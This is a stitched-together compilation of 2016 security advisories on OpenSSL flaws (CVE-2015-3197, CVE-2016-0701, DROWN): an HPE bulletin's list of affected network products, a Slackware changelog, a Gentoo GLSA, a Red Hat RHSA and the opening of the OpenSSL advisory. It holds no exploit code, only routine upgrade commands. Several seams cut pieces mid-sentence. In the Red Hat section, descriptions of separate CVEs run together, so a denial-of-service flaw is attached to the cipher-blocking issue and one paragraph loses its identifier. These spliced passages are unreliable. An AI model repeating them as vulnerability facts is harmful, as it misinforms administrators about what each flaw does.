Chassis\n      - JG621A HP FlexFabric 12910 Main Processing Unit\n      - JG632A HP FlexFabric 12916 Switch AC Chassis\n      - JG634A HP FlexFabric 12916 Main Processing Unit\n      - JH104A HP FlexFabric 12900E Main Processing Unit\n      - JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit\n      - JH263A HP FlexFabric 12904E Main Processing Unit\n      - JH255A HP FlexFabric 12908E Switch Chassis\n      - JH262A HP FlexFabric 12904E Switch Chassis\n      - JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis\n      - JH103A HP FlexFabric 12916E Switch Chassis\n    * CVEs\n      - CVE-2015-3197\n      - CVE-2016-0701\n  + **5900 (Comware 7) - Version: R2432P01**\n    * HP Network Products\n      - JC772A HP 5900AF-48XG-4QSFP+ Switch\n      - JG296A HP 5920AF-24XG Switch\n      - JG336A HP 5900AF-48XGT-4QSFP+ Switch\n      - JG510A HP 5900AF-48G-4XG-2QSFP+ Switch\n      - JG554A HP 5900AF-48XG-4QSFP+ TAA Switch\n      - JG555A HP 5920AF-24XG TAA Switch\n      - JG838A HP FF 5900CP-48XG-4QSFP+ Switch\n      - JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant\n      - JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch\n      - JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant\n    * CVEs\n      - CVE-2015-3197\n      - CVE-2016-0701\n  + **MSR1000 (Comware 7) - Version: R0306P30**\n    * HP Network Products\n      - JG875A HP MSR1002-4 AC Router\n      - JH060A HP MSR1003-8S AC Router\n    * CVEs\n      - CVE-2015-3197\n      - CVE-2016-0701\n  + **MSR2000 (Comware 7) - Version: R0306P30**\n    * HP Network Products\n      - JG411A HP MSR2003 AC Router\n      - JG734A HP MSR2004-24 AC Router\n      - JG735A HP MSR2004-48 Router\n      - JG866A HP MSR2003 TAA-compliant AC Router\n    * CVEs\n      - CVE-2015-3197\n      - CVE-2016-0701\n  + **MSR3000 (Comware 7) - Version: R0306P30**\n    * HP Network Products\n      - JG404A HP MSR3064 Router\n      - JG405A HP MSR3044 Router\n      - JG406A HP MSR3024 AC Router\n      - JG409A HP MSR3012 AC Router\n      - JG409B HPE MSR3012 AC Router\n      - JG861A HP MSR3024 TAA-compliant AC Router\n    * CVEs\n      - CVE-2015-3197\n      - CVE-2016-0701\n  + **MSR4000 (Comware 7) - Version: R0306P30**\n    * HP Network Products\n      - JG402A HP MSR4080 Router Chassis\n      - JG403A HP MSR4060 Router Chassis\n      - JG412A HP MSR4000 MPU-100 Main Processing Unit\n      - JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit\n    * CVEs\n      - CVE-2015-3197\n      - CVE-2016-0701\n  + **MSR95X - Version: R0306P30**\n    * HP Network Products\n      - JH296A HPE MSR954 1GbE SFP 2GbE-WAN 4GbE-LAN CWv7 Router\n      - JH297A HPE MSR954-W 1GbE SFP (WW) 2GbE-WAN 4GbE-LAN Wireless 802.11n\nCWv7 Router\n      - JH298A HPE MSR954-W 1GbE SFP LTE (AM) 2GbE-WAN 4GbE-LAN Wireless\n802.11n CWv7 Router\n      - JH299A HPE MSR954-W 1GbE SFP LTE (WW) 2GbE-WAN 4GbE-LAN Wireless\n802.11n CWv7 Router\n    * CVEs\n      - CVE-2015-3197\n      - CVE-2016-0701\n  + **VSR (Comware 7) - Version: E0322P01**\n    * HP Network Products\n      - JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation\nSoftware\n      - JG811AAE HP VSR1001 Comware 7 Virtual Services Router\n      - JG812AAE HP VSR1004 Comware 7 Virtual Services Router\n      - JG813AAE HP VSR1008 Comware 7 Virtual Services Router\n    * CVEs\n      - CVE-2015-3197\n      - CVE-2016-0701\n  + **7900 (Comware 7) - Version: R2150**\n    * HP Network Products\n      - JG682A HP FlexFabric 7904 Switch Chassis\n      - JG841A HP FlexFabric 7910 Switch Chassis\n      - JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit\n      - JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit\n      - JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis\n      - JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis\n      - JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main\nProcessing Unit\n      - JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main\nProcessing Unit\n    * CVEs\n      - CVE-2015-3197\n      - CVE-2016-0701\n  + **5130EI (Comware 7) - Version: R3113P02**\n    * HP Network Products\n      - JG932A HP 5130-24G-4SFP+ EI Switch\n      - JG933A HP 5130-24G-SFP-4SFP+ EI Switch\n      - JG934A HP 5130-48G-4SFP+ EI Switch\n      - JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch\n      - JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch\n      - JG938A HP 5130-24G-2SFP+-2XGT EI Switch\n      - JG939A HP 5130-48G-2SFP+-2XGT EI Switch\n      - JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch\n      - JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch\n      - JG975A HP 5130-24G-4SFP+ EI Brazil Switch\n      - JG976A HP 5130-48G-4SFP+ EI Brazil Switch\n      - JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch\n      - JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch\n    * CVEs\n      - CVE-2015-3197\n      - CVE-2016-0701\n  + **6125XLG - Version: R2432P01**\n    * HP Network Products\n      - 711307-B21 HP 6125XLG Blade Switch\n      - 737230-B21 HP 6125XLG Blade Switch with TAA\n    * CVEs\n      - CVE-2015-3197\n      - CVE-2016-0701\n  + **6127XLG - Version: R2432P01**\n    * HP Network Products\n      - 787635-B21 HP 6127XLG Blade Switch Opt Kit\n      - 787635-B22 HP 6127XLG Blade Switch with TAA\n    * CVEs\n      - CVE-2015-3197\n      - CVE-2016-0701\n  + **Moonshot - Version: R2432P01**\n    * HP Network Products\n      - 786617-B21 - HP Moonshot-45Gc Switch Module\n      - 704654-B21 - HP Moonshot-45XGc Switch Module\n      - 786619-B21 - HP Moonshot-180XGc Switch Module\n    * CVEs\n      - CVE-2015-3197\n      - CVE-2016-0701\n  + **5700 (Comware 7) - Version: R2432P01**\n    * HP Network Products\n      - JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch\n      - JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch\n      - JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch\n      - JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch\n      - JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch\n      - JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch\n    * CVEs\n      - CVE-2015-3197\n      - CVE-2016-0701\n  + **5930 (Comware 7) - Version: R2432P01**\n    * HP Network Products\n      - JG726A HP FlexFabric 5930 32QSFP+ Switch\n      - JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch\n      - JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch\n      - JH179A HP FlexFabric 5930 4-slot Switch\n      - JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch\n      - JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch\n    * CVEs\n      - CVE-2015-3197\n      - CVE-2016-0701\n  + **1950 (Comware 7) - Version: R3113P02**\n    * HP Network Products\n      - JG960A HP 1950-24G-4XG Switch\n      - JG961A HP 1950-48G-2SFP+-2XGT Switch\n      - JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch\n      - JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch\n    * CVEs\n      - CVE-2015-3197\n      - CVE-2016-0701\n  + **7500 (Comware 7) - Version: R7183**\n    * HP Network Products\n      - JD238C HP 7510 Switch Chassis\n      - JD239C HP 7506 Switch Chassis\n      - JD240C HP 7503 Switch Chassis\n      - JD242C HP 7502 Switch Chassis\n      - JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only\nMain Processing Unit\n      - JH208A HP 7502 Main Processing Unit\n      - JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port\n40GbE QSFP+ Main Processing Unit\n    * CVEs\n      - CVE-2015-3197\n      - CVE-2016-0701\n  + **5130HI - Version: R1120P07**\n    * HP Network Products\n      - JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch\n      - JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch\n      - JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch\n      - JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch\n    * CVEs\n      - CVE-2015-3197\n      - CVE-2016-0701\n  + **5510HI - Version: R1120P07**\n    * HP Network Products\n      - JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch\n      - JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch\n      - JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch\n      - JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch\n      - JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch\n    * CVEs\n      - CVE-2015-3197\n      - CVE-2016-0701\n  + **VCX - Version: 9.8.19**\n    * HP Network Products\n      - J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr\n      - J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr\n      - JC517A HP VCX V7205 Platform w/DL 360 G6 Server\n      -  JE355A HP VCX V6000 Branch Platform 9.0\n      - JC516A HP VCX V7005 Platform w/DL 120 G6 Server\n      - JC518A HP VCX Connect 200 Primry 120 G6 Server\n      - J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr\n      - JE341A HP VCX Connect 100 Secondary\n      - JE252A HP VCX Connect Primary MIM Module\n      - JE253A HP VCX Connect Secondary MIM Module\n      - JE254A HP VCX Branch MIM Module\n      - JE355A HP VCX V6000 Branch Platform 9.0\n      - JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod\n      - JD023A HP MSR30-40 Router with VCX MIM Module\n      - JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM\n      - JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod\n      - JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod\n      - JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod\n      - JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS\n      - JE340A HP VCX Connect 100 Pri Server 9.0\n      - JE342A HP VCX Connect 100 Sec Server 9.0\n    * CVEs\n      - CVE-2015-3197\n \n **Note:** Please contact HPE Technical Support if any assistance is needed\nacquiring the software updates. \n\nHISTORY\nVersion:1 (rev.1) - 14 February 2017 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n  Web form: https://www.hpe.com/info/report-security-vulnerability\n  Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1r-i486-1_slack14.1.txz:  Upgraded. \n  This update fixes the following security issue:\n  SSLv2 doesn\u0027t block disabled ciphers (CVE-2015-3197). \n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project!  :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1r-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1r-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1r-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1r-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1r-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1r-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1r-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1r-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.2f-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.2f-i586-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.2f-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.2f-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 packages:\n0d6e8d3b27326c84b9996ed189868eba  openssl-1.0.1r-i486-1_slack14.0.txz\ne3cb0b75e9df4be9d8fd1cfcd2fbd306  openssl-solibs-1.0.1r-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\n7b52f4a43b42703a6840945d55f503ee  openssl-1.0.1r-x86_64-1_slack14.0.txz\neee92cb549bacae21e63bee22b9bb8d4  openssl-solibs-1.0.1r-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n5be72ab551b2064aa34c83b42a07ff85  openssl-1.0.1r-i486-1_slack14.1.txz\nb28e00a7124822258cfd137ab5ce0572  openssl-solibs-1.0.1r-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\n8e0273b1e99e8caa48fcab2547f051e9  openssl-1.0.1r-x86_64-1_slack14.1.txz\n60f3994c35679455cab7a984493d1fdb  openssl-solibs-1.0.1r-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n509771b1f7d58a682feb2099fdf3eb5d  a/openssl-solibs-1.0.2f-i586-1.txz\nd72c0188f4223d1dc2d6080f8d99d92e  n/openssl-1.0.2f-i586-1.txz\n\nSlackware x86_64 -current packages:\n0c6653d3c37271f9f1a58a8c0e1f7b40  a/openssl-solibs-1.0.2f-x86_64-1.txz\ne4ebd1204644ea58e1779187fe071428  n/openssl-1.0.2f-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1r-i486-1_slack14.1.txz openssl-solibs-1.0.1r-i486-1_slack14.1.txz \n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list:                          |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message:                                                     |\n|                                                                        |\n|   unsubscribe slackware-security                                       |\n|                                                                        |\n| You will get a confirmation message back containing instructions to    |\n| complete the process.  Please do not reply to this email address. 5.9 server) - i386, ia64, x86_64\n\n3. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 201601-05\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                           https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n    Title: OpenSSL: Multiple vulnerabilities\n     Date: January 29, 2016\n     Bugs: #572854\n       ID: 201601-05\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, allowing remote\nattackers to disclose sensitive information and complete weak\nhandshakes. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  dev-libs/openssl             \u003c 1.0.2f                  \u003e= 1.0.2f\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in OpenSSL. Please review\nthe upstream advisory and CVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.2f\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-3197\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3197\n[ 2 ] CVE-2016-0701\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0701\n[ 3 ] OpenSSL Security Advisory [28th Jan 2016]\n      http://openssl.org/news/secadv/20160128.txt\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201601-05\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: openssl098e security update\nAdvisory ID:       RHSA-2016:0372-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2016-0372.html\nIssue date:        2016-03-09\nCVE Names:         CVE-2015-0293 CVE-2015-3197 CVE-2016-0703 \n                   CVE-2016-0704 CVE-2016-0800 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl098e packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library. \n\nA padding oracle flaw was found in the Secure Sockets Layer version 2.0\n(SSLv2) protocol. An attacker can potentially use this flaw to decrypt\nRSA-encrypted cipher text from a connection using a newer SSL/TLS protocol\nversion, allowing them to decrypt such connections. This cross-protocol\nattack is publicly referred to as DROWN. (CVE-2016-0800)\n\nNote: This issue was addressed by disabling the SSLv2 protocol by default\nwhen using the \u0027SSLv23\u0027 connection methods, and removing support for weak\nSSLv2 cipher suites. For more information, refer to the knowledge base\narticle linked to in the References section. \n\nIt was discovered that the SSLv2 servers using OpenSSL accepted SSLv2\nconnection handshakes that indicated non-zero clear key length for\nnon-export cipher suites. An attacker could use this flaw to decrypt\nrecorded SSLv2 sessions with the server by using it as a decryption \noracle.(CVE-2016-0703)\n\nIt was discovered that the SSLv2 protocol implementation in OpenSSL did\nnot properly implement the Bleichenbacher protection for export cipher\nsuites. An attacker could use a SSLv2 server using OpenSSL as a\nBleichenbacher oracle. \n\nA denial of service flaw was found in the way OpenSSL handled SSLv2\nhandshake messages. This could result in weak\nSSLv2 ciphers being used for SSLv2 connections, making them vulnerable to\nman-in-the-middle attacks. (CVE-2015-3197)\n\nRed Hat would like to thank the OpenSSL project for reporting these issues. \nUpstream acknowledges Nimrod Aviram and Sebastian Schinzel as the original\nreporters of CVE-2016-0800 and CVE-2015-3197; David Adrian (University of\nMichigan) and J. Alex Halderman (University of Michigan) as the original\nreporters of CVE-2016-0703 and CVE-2016-0704; and Sean Burford (Google) and\nEmilia K\u00e4sper (OpenSSL development team) as the original reporters of\nCVE-2015-0293. For the update\nto take effect, all services linked to the openssl098e library must be\nrestarted, or the system rebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1202404 - CVE-2015-0293 openssl: assertion failure in SSLv2 servers\n1301846 - CVE-2015-3197 OpenSSL: SSLv2 doesn\u0027t block disabled ciphers\n1310593 - CVE-2016-0800 SSL/TLS: Cross-protocol attack on TLS using SSLv2 (DROWN)\n1310811 - CVE-2016-0703 openssl: Divide-and-conquer session key recovery in SSLv2\n1310814 - CVE-2016-0704 openssl: SSLv2 Bleichenbacher protection overwrites wrong bytes for export ciphers\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl098e-0.9.8e-20.el6_7.1.src.rpm\n\ni386:\nopenssl098e-0.9.8e-20.el6_7.1.i686.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm\n\nx86_64:\nopenssl098e-0.9.8e-20.el6_7.1.i686.rpm\nopenssl098e-0.9.8e-20.el6_7.1.x86_64.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl098e-0.9.8e-20.el6_7.1.src.rpm\n\nx86_64:\nopenssl098e-0.9.8e-20.el6_7.1.i686.rpm\nopenssl098e-0.9.8e-20.el6_7.1.x86_64.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl098e-0.9.8e-20.el6_7.1.src.rpm\n\ni386:\nopenssl098e-0.9.8e-20.el6_7.1.i686.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm\n\nppc64:\nopenssl098e-0.9.8e-20.el6_7.1.ppc.rpm\nopenssl098e-0.9.8e-20.el6_7.1.ppc64.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.ppc.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.ppc64.rpm\n\ns390x:\nopenssl098e-0.9.8e-20.el6_7.1.s390.rpm\nopenssl098e-0.9.8e-20.el6_7.1.s390x.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.s390.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.s390x.rpm\n\nx86_64:\nopenssl098e-0.9.8e-20.el6_7.1.i686.rpm\nopenssl098e-0.9.8e-20.el6_7.1.x86_64.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl098e-0.9.8e-20.el6_7.1.src.rpm\n\ni386:\nopenssl098e-0.9.8e-20.el6_7.1.i686.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm\n\nx86_64:\nopenssl098e-0.9.8e-20.el6_7.1.i686.rpm\nopenssl098e-0.9.8e-20.el6_7.1.x86_64.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.i686.rpm\nopenssl098e-debuginfo-0.9.8e-20.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl098e-0.9.8e-29.el7_2.3.src.rpm\n\nx86_64:\nopenssl098e-0.9.8e-29.el7_2.3.i686.rpm\nopenssl098e-0.9.8e-29.el7_2.3.x86_64.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.i686.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl098e-0.9.8e-29.el7_2.3.src.rpm\n\nx86_64:\nopenssl098e-0.9.8e-29.el7_2.3.i686.rpm\nopenssl098e-0.9.8e-29.el7_2.3.x86_64.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.i686.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl098e-0.9.8e-29.el7_2.3.src.rpm\n\nppc64:\nopenssl098e-0.9.8e-29.el7_2.3.ppc.rpm\nopenssl098e-0.9.8e-29.el7_2.3.ppc64.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.ppc.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.ppc64.rpm\n\ns390x:\nopenssl098e-0.9.8e-29.el7_2.3.s390.rpm\nopenssl098e-0.9.8e-29.el7_2.3.s390x.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.s390.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.s390x.rpm\n\nx86_64:\nopenssl098e-0.9.8e-29.el7_2.3.i686.rpm\nopenssl098e-0.9.8e-29.el7_2.3.x86_64.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.i686.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl098e-0.9.8e-29.el7_2.3.src.rpm\n\nx86_64:\nopenssl098e-0.9.8e-29.el7_2.3.i686.rpm\nopenssl098e-0.9.8e-29.el7_2.3.x86_64.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.i686.rpm\nopenssl098e-debuginfo-0.9.8e-29.el7_2.3.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-0293\nhttps://access.redhat.com/security/cve/CVE-2015-3197\nhttps://access.redhat.com/security/cve/CVE-2016-0703\nhttps://access.redhat.com/security/cve/CVE-2016-0704\nhttps://access.redhat.com/security/cve/CVE-2016-0800\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/articles/2176731\nhttps://drownattack.com/\nhttps://openssl.org/news/secadv/20160128.txt\nhttps://openssl.org/news/secadv/20160301.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFW36N0XlSAg2UNWIIRAqYBAJ98/98OOTx9c6LlkPHMl7SfneXccQCfX2LY\nBQ+47lH1uQT1a3RxlYkETOk=\n=TqD1\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce. OpenSSL Security Advisory [28th Jan 2016]\n=========================================\n\nNOTE: SUPPORT FOR VERSION 1.0.1 WILL BE ENDING ON 31ST DECEMBER 2016. NO\nSECURITY FIXES WILL BE PROVIDED AFTER THAT DATE. UNTIL THAT TIME SECURITY FIXES\nONLY ARE BEING APPLIED. \n\nDH small subgroups (CVE-2016-0701)\n==================================\n\nSeverity: High\n\nHistorically OpenSSL usually only ever generated DH parameters based on 